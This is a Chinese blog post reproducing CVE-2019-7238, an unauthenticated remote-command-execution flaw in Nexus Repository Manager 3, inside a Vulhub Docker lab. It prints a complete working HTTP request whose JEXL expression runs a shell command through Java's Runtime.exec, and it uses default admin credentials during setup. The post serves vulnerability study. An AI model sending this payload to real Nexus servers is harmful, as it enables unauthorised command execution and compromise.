Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238

电玩女神 2021-08-31 09:15 426阅读 0赞

**目录**

Vulnhub官方复现教程

漏洞原理

复现过程

启动环境

漏洞复现

端口设置

--------------------

## Vulnhub官方复现教程 ##

[https://vulhub.org/\#/environments/nexus/CVE-2019-7238/][https_vulhub.org_environments_nexus_CVE-2019-7238]

### 漏洞原理 ###

Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未授权访问漏洞，将可以导致任意命令执行漏洞。

参考链接：

*  [https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019][https_support.sonatype.com_hc_en-us_articles_360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019]
 *  [https://xz.aliyun.com/t/4136][https_xz.aliyun.com_t_4136]
 *  [https://www.anquanke.com/post/id/171116][https_www.anquanke.com_post_id_171116]
 *  [http://commons.apache.org/proper/commons-jexl/][http_commons.apache.org_proper_commons-jexl]

## 复现过程 ##

### 启动环境 ###

[https://blog.csdn.net/JiangBuLiu/article/details/93853056][https_blog.csdn.net_JiangBuLiu_article_details_93853056]  
进入路径为

cd /root/vulhub/nexus/CVE-2019-7238

搭建及运行漏洞环境：

docker-compose build && docker-compose up -d

用时：3分钟  
环境启动后，访问`http://your-ip:8081`即可看到Web页面。

使用账号密码`admin:admin123`登录后台，在`http://192.168.236.148:8081/#browse/upload`选择`maven-releases`，随便上传一个jar包：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70]  
显示  
![在这里插入图片描述][20190712164622264.png]  
触发该漏洞，必须保证仓库里至少有一个包存在。  
![在这里插入图片描述][20190712164637893.png]

### 漏洞复现 ###

接口没有校验权限，所以直接发送如下数据包，即可执行`touch /tmp/CVE-2019-7238_is_success`命令：

### 端口设置 ###

浏览器设置

以火狐浏览器FireFox为例，在`选项`→`常规`→`网络设置`→`设置`，将`连接`中`手动代理配置`的`HTTP代理`，填写`127.0.0.1`，端口为`8081`  
![在这里插入图片描述][20190709101117171.png]

BurpSuit设置

在`Proxy`下`Options`的`Proxy Listeners`编辑监听端口为`8081`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70 1]  
并将`Proxy`下`Intercept`点击成`Intercept is on`

发送请求

POST /service/extdirect HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: */*
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 368
    Connection: close
    
    {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
    [{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/CVE-2019-7238_is_success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70 2]

updatedb && locate CVE-2019-7238_is_success

可见，`/tmp/CVE-2019-7238_is_success`已成功执行：  
![在这里插入图片描述][20190712165349477.png]  
原理是expression位置的JEXL表达式被执行，详情可阅读参考文档。

利用classloader加载字节码即可获得回显：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70 3]

[https_vulhub.org_environments_nexus_CVE-2019-7238]: https://vulhub.org/#/environments/nexus/CVE-2019-7238/
[https_support.sonatype.com_hc_en-us_articles_360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019]: https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
[https_xz.aliyun.com_t_4136]: https://xz.aliyun.com/t/4136
[https_www.anquanke.com_post_id_171116]: https://www.anquanke.com/post/id/171116
[http_commons.apache.org_proper_commons-jexl]: http://commons.apache.org/proper/commons-jexl/
[https_blog.csdn.net_JiangBuLiu_article_details_93853056]: https://blog.csdn.net/JiangBuLiu/article/details/93853056
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70]: /images/20210728/d9aa3f8db8e8460bb4a41f8a00a9f824.png
[20190712164622264.png]: /images/20210728/39e33f9275ea434ebe370705b5e9bed0.png
[20190712164637893.png]: /images/20210728/c946adedf9cb478ba46218a82884a30d.png
[20190709101117171.png]: /images/20210728/5c34134993584f539d3b3923b6485d69.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70 1]: /images/20210728/4764d0068aa94a5197bc5a14d3ad8ddb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70 2]: /images/20210728/5be4eaa7df8046b7bba3f4320127a6b2.png
[20190712165349477.png]: /images/20210728/c2b75b2582404ce5a3c3790d34f9fd24.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0ppYW5nQnVMaXU_size_16_color_FFFFFF_t_70 3]: /images/20210728/c3d8b49b9f88448cb820a24c7078239c.png